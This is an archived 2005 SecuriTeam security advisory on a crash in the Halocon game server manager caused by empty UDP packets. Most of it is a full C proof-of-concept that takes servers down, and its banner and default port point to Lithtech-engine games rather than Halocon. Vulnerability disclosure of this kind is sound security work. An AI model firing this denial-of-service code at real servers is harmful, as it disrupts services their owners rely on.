[NT] Halocon Malformed UDP DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 01/17/05

  • Next message: SecuriTeam: "[NT] Breed Malfored UDP DoS" 
    To: list@securiteam.com
Date: 17 Jan 2005 14:07:33 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Halocon Malformed UDP DoS
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.zaboo.net> Halocon is "a remote server manager written by
    jazper". By sending a malformed UDP packet to the Halocon game server it
    possible to cause it to crash.

    DETAILS

    An empty UDP packet (zero bytes) leads to the automatic termination of the
    Halocon server's socket. So the admin will be no longer able to send
    remote commands to the Halocon application.

    Exploit:
    Halocon works on port 2305 by default, so remember to specify it when use
    the proof-of-concept.

    /*

    by Luigi Auriemma - http://aluigi.altervista.org/poc/lithsock.zip

    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    #ifdef WIN32
        #include <winsock.h>
        #include "winerr.h"

        #define close closesocket
        #define ONESEC 1000
    #else
        #include <unistd.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <arpa/inet.h>
        #include <netinet/in.h>
        #include <netdb.h>

        #define ONESEC 1
    #endif

    #define VER "0.1"
    #define BUFFSZ 2048
    #define PORT 27888
    #define TIMEOUT 3
    #define CHECK "\x10\x7f\x33\x01"
    #define ZERO "" // 0 bytes, a cool bug

    #define SEND(x) if(sendto(sd, x, sizeof(x) - 1, 0, (struct sockaddr
    *)&peer, sizeof(peer)) \
                      < 0) std_err();

    int info_proto(u_char *data);
    int timeout(int sock);
    u_long resolv(char *host);
    void std_err(void);

    int main(int argc, char *argv[]) {
        struct sockaddr_in peer;
        int sd,
                len;
        u_short port = PORT;
        u_char buff[BUFFSZ];

        setbuf(stdout, NULL);

        fputs("\n"
            "Lithtech engine (new protocol) socket unreacheable "VER"\n"
            " Contract Jack <= 1.1\n"
            " No one lives forever 2 <= 1.3\n"
            " Tron 2.0 <= 1.042\n"
            "by Luigi Auriemma\n"
            "e-mail: aluigi@autistici.org\n"
            "web: http://aluigi.altervista.org\n"
            "\n", stdout);

        if(argc < 2) {
            printf("\n"
                "Usage: %s <host> [port(%d)]\n"
                "\n", argv[0], port);
            exit(1);
        }

    #ifdef WIN32
        WSADATA wsadata;
        WSAStartup(MAKEWORD(1,0), &wsadata);
    #endif

        if(argc > 2) port = atoi(argv[2]);
        peer.sin_addr.s_addr = resolv(argv[1]);
        peer.sin_port = htons(port);
        peer.sin_family = AF_INET;

        printf("- target %s : %hu\n",
            inet_ntoa(peer.sin_addr), port);

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        fputs("- check if server is online\n", stdout);
        SEND(CHECK);
        if(timeout(sd) < 0) {
            fputs("\nError: socket timeout, no reply received\n\n", stdout);
            exit(1);
        } else {
            len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
            if(len < 0) std_err();
            if(memcmp(buff, CHECK, 3)) {
                if(*buff == '\\') {
                    fputs("- received an information reply, seems you have
    specified a wrong port.\n"
                        " Try with a lower one\n", stdout);
                } else {
                    fputs("\nError: unknown data received, this is none of the
    vulnerable games\n\n", stdout);
                }
                exit(1);
            }
        }

        fputs("- send a ZERO bytes packet\n", stdout);
        SEND(ZERO);

        fputs("- wait one second\n", stdout);
        sleep(ONESEC);

        fputs("- check if the server is vulnerable:\n", stdout);
        SEND(CHECK);

        if(timeout(sd) < 0) {
            fputs("\nServer IS vulnerable!!!\n\n", stdout);
        } else {
            fputs("\nServer doesn't seem vulnerable\n\n", stdout);
        }

        close(sd);

        return(0);
    }

    int timeout(int sock) {
        struct timeval tout;
        fd_set fd_read;
        int err;

        tout.tv_sec = TIMEOUT;
        tout.tv_usec = 0;
        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        err = select(sock + 1, &fd_read, NULL, NULL, &tout);
        if(err < 0) std_err();
        if(!err) return(-1);
        return(0);
    }

    u_long resolv(char *host) {
        struct hostent *hp;
        u_long host_ip;

        host_ip = inet_addr(host);
        if(host_ip == INADDR_NONE) {
            hp = gethostbyname(host);
            if(!hp) {
                printf("\nError: Unable to resolv hostname (%s)\n", host);
                exit(1);
            } else host_ip = *(u_long *)hp->h_addr;
        }
        return(host_ip);
    }

    #ifndef WIN32
        void std_err(void) {
            perror("\nError");
            exit(1);
        }
    #endif

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:aluigi@autistici.org> Luigi
    Auriemma.
    The original article can be found at:
    <http://aluigi.altervista.org/adv/halocon-adv.txt>
    http://aluigi.altervista.org/adv/halocon-adv.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NT] Breed Malfored UDP DoS"

    Relevant Pages